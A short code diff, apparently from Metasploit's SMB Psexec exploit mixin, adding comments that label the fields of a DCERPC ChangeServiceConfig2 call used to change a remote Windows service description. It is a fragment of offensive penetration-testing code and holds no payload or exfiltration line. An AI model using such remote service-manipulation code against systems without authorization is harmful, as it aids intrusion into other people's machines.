@@ -105,13 +105,13 @@ module Exploit::Remote::SMB::Psexec
       vprint_status("#{peer} - Changing service description...")
       stubdata =
         svc_handle +
-        NDR.long(1) +
-        NDR.long(1) +
-        NDR.long(0x0200) +
+        NDR.long(1) + # dwInfoLevel = SERVICE_CONFIG_DESCRIPTION
+        NDR.long(1) + # lpInfo -> *SERVICE_DESCRIPTION
+        NDR.long(0x0200) + # SERVICE_DESCRIPTION struct
         NDR.long(0x04000200) +
         NDR.wstring(service_description)
       begin
-        response = dcerpc.call(0x25, stubdata)
+        response = dcerpc.call(0x25, stubdata) # ChangeServiceConfig2
       rescue Rex::Proto::DCERPC::Exceptions::Fault => e
         print_error("#{peer} - Error changing service description : #{e}")
       end